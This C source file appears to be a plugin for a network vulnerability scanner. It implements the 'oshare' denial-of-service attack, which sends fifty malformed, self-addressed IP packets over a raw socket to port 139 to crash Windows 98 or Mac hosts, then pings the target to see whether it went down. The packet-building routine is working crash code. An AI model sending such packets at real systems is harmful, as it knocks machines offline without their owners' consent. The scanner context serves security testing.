

/****************************************************************************/
/*      [ oshare_1_gou  ver 0.1 ]  -- Dressing up No.1 --                                               */
/*                                                                                                                                                      */
/*                                                                                                                                                      */
/*       This program transmits the "oshare" packet which starts a machine aga- */
/*      in or crash. But, because it can't pass through the router, it can be   */
/*      carried out only in the same segment.                                                                   */
/*       "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha- */
/*      nged, it has already tested that it becomes possible to kill Mac, too.  */
/*      -----------------------------------------                                                               */
/*      Written by R00t Zer0                                                                                                    */
/*      E-Mail  : defcon0@ugtop.com                                                                                             */
/*      Web URL : http://www.ugtop.com/defcon0/index.htm                                                */
/****************************************************************************/

#include <includes.h>
#ifdef HAVE_NETINET_IP_H
#include <netinet/ip.h>
#endif

/*
 *  XXX Rather than using struct iphdr we prefer the autoconf driven
 *  definitions from hostloop/icmp.h. If this doesn't cause trouble
 *  for 6 months or so, we can silently remove this comment.
 *
 *  Jochen Wiedmann, 28.01.1999
 *
 * #ifdef linux
 * #define ip iphdr
 * #define ip_v version
 * #define ip_hl ihl
 * #define ip_tos tos
 * #define ip_len tot_len
 * #define ip_id id
 * #define ip_off frag_off
 * #define ip_ttl ttl
 * #define ip_p protocol
 * #define ip_sum check
 * #endif
 *
 */
 
#include "../../hostloop/icmp.h"

#define NAME "oshare"
#define DESC "\
It is possible to crash a Windows 98 computer by sending it\n\
a badly formed packet.\n\
This plugin implements the oshare attack, the details\n\
of which can be found in the BugTraq archive\n\
Risk factor : High"
#define COPYRIGHT "original code by R00t Zer0"
#define SUMM "crashes a Win98 computer"

unsigned short
in__cksum (addr, len)
     u_short *addr;
     int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }

  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

int             send_oshare_packet( int, u_long );


int
send_oshare_packet( int sock_send, u_long dst_addr )
        {
        char    *packet;
        int             send_status;
        struct  ip           *ip;
        struct  sockaddr_in     to;

        packet  = ( char *)malloc( 40 );
        ip              = ( struct      ip *)( packet );
        memset( packet, 0, 40 );

        ip->ip_v            	        = 4;
        ip->ip_hl                       = 11;
        ip->ip_tos                 	= 0x00;
        ip->ip_len             		=  FIX(44) ;
        ip->ip_id                  	= htons( 1999 );
        ip->ip_off   		        = htons( 16383 );
        ip->ip_ttl     		        = 0xff;
        ip->ip_p    			= IPPROTO_UDP;
        ip->ip_src.s_addr               = dst_addr;
        ip->ip_dst.s_addr 		= dst_addr;
        ip->ip_sum        		= in__cksum( ( u_short *)ip,44);

        to.sin_family     		= AF_INET;
        to.sin_port       		= htons(139);
        to.sin_addr.s_addr		= dst_addr;

        send_status = sendto( sock_send, packet, 40, 0,
                             ( struct sockaddr *)&to, sizeof( struct sockaddr ) );

        free( packet );
        return( send_status );
        }


ExtFunc int plugin_init(struct arglist * args)
{
    plug_set_name(args, NAME);
    plug_set_description(args, DESC);
    plug_set_summary(args, SUMM);
    plug_set_copyright(args, COPYRIGHT);
    plug_set_category(args, ACT_DENIAL);
    plug_set_family(args, "Denial of Service");
    
    return(0);
}

ExtFunc int plugin_run(struct arglist * args)
        {
        char    tmp_buffer[ 1024 ];
        int             loop, loop2;
	int ping = 0;
	int on = 1;
        int             sock_send;
        u_long  src_addr, dst_addr;
        u_short src_port, dst_port;

        struct  hostent         *host;
        struct  sockaddr_in     addr;
	struct in_addr * paddr;
        time_t  t;

       

        t = time( 0 );
        srand( ( u_int )t );

	paddr = plug_get_host_ip(args);
        if(!paddr)return(0);
        ping = ping_host(*paddr);
        
        memset( &addr, 0, sizeof( struct sockaddr_in ) );
        dst_addr = paddr->s_addr;
       


        if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1)
                {
                return( -1 );
                }
#ifdef IP_HDRINCL
    if (setsockopt(sock_send, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))< 0)
    	return(1);
    
#endif
        for( loop = 0; loop < 50; loop++ )send_oshare_packet( sock_send, dst_addr);
        close( sock_send );
        sleep(4);
        if(ping)
        {
         if(!ping_host(*paddr))
         {
          post_hole(args, -1, "\
A denial of service could be performed using the 'oshare' attack\n\
Solution : contact your vendor for a fix");
	 }
        }
        else
        post_info(args, -1, "\
A denial of service *may* have been performed using the 'oshare' attack\n\
although we could not check it\n\
Solution : contact your vendor for a fix");
        
}
